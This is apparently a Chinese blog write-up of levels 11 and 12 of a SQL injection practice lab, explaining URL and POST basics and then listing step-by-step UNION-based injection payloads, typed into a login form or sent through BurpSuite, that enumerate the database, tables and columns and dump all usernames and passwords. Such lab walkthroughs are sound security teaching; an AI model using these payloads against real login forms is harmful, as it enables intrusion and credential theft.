【sql靶场】第11、12关-post提交注入

目录

【sql靶场】第11、12关-post提交注入

POST

一、URL

二、核心组成部分

三、数据编码规范

四、应用场景与请求方法

第十一关

方法一

步骤一

步骤二

步骤三

步骤四

步骤五

步骤六

步骤七

方法二

步骤一

步骤二

步骤三

步骤四

步骤五

步骤六

步骤七

第十二关


【sql靶场】第11、12关-post提交注入

POST

关卡讲解前小知识,不看可以跳过

一、URL

URL(Uniform Resource Locator)是互联网上唯一标识资源位置的字符串,包含协议、主机地址、路径等核心部分,用于定位和访问网络资源‌12。其标准格式为: 协议://主机地址[:端口号]/路径?查询参数#锚点 https://www.example.com:8080/api/users?id=123#section1

二、核心组成部分

‌协议(Scheme)‌,定义资源访问的通信协议,例如:

http:超文本传输协议(明文传输)‌ https:加密的HTTP协议(安全性更高)‌ ftp:文件传输协议

主机地址(Host)

域名:如 www.example.com IP地址:如 202.108.22.5

端口号:可选,默认HTTP为80,HTTPS为443,自定义端口需显式指定(如:8080)‌

‌路径(Path): 表示服务器上的资源路径,如 /api/users/img/logo.png‌12。

‌查询参数(Query Parameters):以 ? 开头,key=value 形式通过 & 分隔,用于向服务器传递附加参数,如 ?name=John&age=30。

‌锚点(Fragment)以 # 开头,用于页面内导航(如 #section1),仅客户端使用,不发送至服务器‌。

三、数据编码规范

URL中非ASCII字符(如中文、空格)需进行‌URL编码

规则如下:将字符转换为十六进制值,前缀加 %(如空格 → %20/%2F)‌,编码方式由浏览器或编程语言决定,可通过 encodeURIComponent() 等函数统一处理‌。

示例*: https://example.com/search?q=%E4%B8%AD%E6%96%87(搜索"中文")

四、应用场景与请求方法

GET请求

数据通过URL参数传递,明文暴露于地址栏,适用于非敏感数据(如搜索关键词)‌。

受URL长度限制(通常≤2048字符)‌。

POST请求

数据通过请求体传输,URL中仅包含资源路径(如 https://example.com/login)‌。

适合提交敏感信息(如密码)或大量数据(如文件上传)‌

第十一关

这一关提交方式从get变成了post,使得数据不会通过URL参数传递,明文暴露于地址栏,所以使用post提交POST请求的数据存储在‌**请求体(Body)**‌中,而非URL参数,URL中仅包含资源路径,这里就不需要再地址栏进行测试,但是我们可以在页面的账号密码输入里尝试,可不可以进行注入

学习阶段尝试注入方法有

方法一:直接在页面的账号密码输入框里面进行注入

方法二:使用BurpSuite进行拦截注入

方法一
步骤一

在账号或者密码输入框中进行测试单引号闭合

复制代码
1'

发现账号密码的输入框都可以进行注入

步骤二

进行测试列数

复制代码
1' order by 5 #
复制代码
1' order by 3 #
复制代码
1' order by 2 #

最后测试出来列数为二

步骤三

知道了列数,进行测试回显

复制代码
1' union select 1,2 #

测试出来账号回显为1,密码为2

步骤四

进行注入数据库名

复制代码
1' union select 1,database() #
步骤五

注入表名

复制代码
1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security')#
步骤六

注入字段名

复制代码
1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema= 'security' and table_name='users')#
步骤七

注入账号密码

复制代码
1' union select  1,(select group_concat(concat_ws(0x3a,username,password)) from users)#
方法二
步骤一

打开BurpSuite,点击代理然后点击截断的截断请求,然后打开火狐浏览器,打开关卡页面,随便输入账号密码,点击提交

步骤二

进行测试列数

复制代码
1' order by 5 #
复制代码
1' order by 3 #
复制代码
1' order by 2 #

最后测试出来列数为二

步骤三

知道了列数,进行测试回显

复制代码
1' union select 1,2 #

测试出来账号回显为1,密码为2

步骤四

进行注入数据库名

复制代码
1' union select 1,database() #
步骤五

注入表名

复制代码
1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security')#
步骤六

注入字段名

复制代码
1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema= 'security' and table_name='users')#
步骤七

注入账号密码

复制代码
1' union select  1,group_concat(concat_ws(0x3a,username,password)) from users#

方法一与方法二差不多,看个人喜欢,而且单单从sql靶场这几个关卡来看,post提交这里的sql关卡和前面的get提交差不多,只是将从地址栏注入变成了输入框或者拦截注入

其实还有一个方式可以注入,就是利用软件工具等等进行漏洞扫描注入

第十二关

与第十一关基本一样,只是闭合方式变成了"

相关推荐
huangyuchi.1 分钟前
【Linux】进程切换与优先级
linux·运维·笔记·进程切换·进程优先级·寄存器·linux调度算法
火凤凰--凤凰码路1 小时前
MySQL 中的“双路排序”与“单路排序”:原理、判别与实战调优
android·数据库·mysql
m0_564264182 小时前
开源数据库E-R图绘制工具分享
数据库·经验分享·mysql·e-r图·开源工具
Y小葵2 小时前
【Practical Business English Oral Scene Interpretation】入职面试No.8~9
笔记·学习·职场和发展
····懂···3 小时前
关于PGCE专家技术认证解决方案
数据库·postgresql
花海如潮淹3 小时前
API安全监测工具:数字经济的免疫哨兵
网络·经验分享·笔记·安全
秋千码途3 小时前
小架构step系列22:加载系统配置
数据库·架构
zone_z3 小时前
告别静态文档!Oracle交互式技术架构图让数据库学习“活“起来
数据库·学习·oracle
洁可3 小时前
上位机程序开发基础介绍
c++·笔记
旧时光巷3 小时前
SQL基础⑭ | 变量、流程控制与游标篇
数据库·sql·学习·mysql·变量·游标·流程控制